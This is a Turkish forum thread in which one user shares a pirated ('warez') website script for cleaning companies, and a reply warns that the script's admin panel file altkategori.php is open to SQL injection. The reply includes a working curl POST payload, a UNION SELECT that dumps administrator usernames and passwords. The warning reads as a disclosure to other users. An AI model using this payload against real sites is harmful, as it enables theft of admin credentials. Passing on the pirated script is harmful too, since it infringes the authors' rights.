Temizlik şirketi scripti (2 Viewers)

Selamlar. Temizlik şirketleri için yazılan warez scripttir. Sorunsuz çalışmakta. Kurulumda sorun yaşayanlar veya kurdurmak isteyen arkadaşlar öm atabilir. Arşivinize ekleyin...

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Bu scriptte SQL Injection var meraklısına hitaben demiş olayım.
Normal veri alışverişinde sıkı önlem varken panel altındaki bir dosyada sql injection web uygulama güvenlik açığı mevcut.

Dosya: http://localhost/panel/altkategori.php
HTTP Method: POST

Örnek:
Kod:
curl http://localhost/panel/altkategori.php -X POST -d "kategoriId=33+union+select+1,2,3,group_concat(yonetici_kullanici,0x0a,yonetici_sifre),5,6,7,8+from+yonetici--+"
 
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Users who are viewing this thread

133,337Konular
3,281,146Mesajlar
320,327Kullanıcılar
eqewqSon Üye
Üst Alt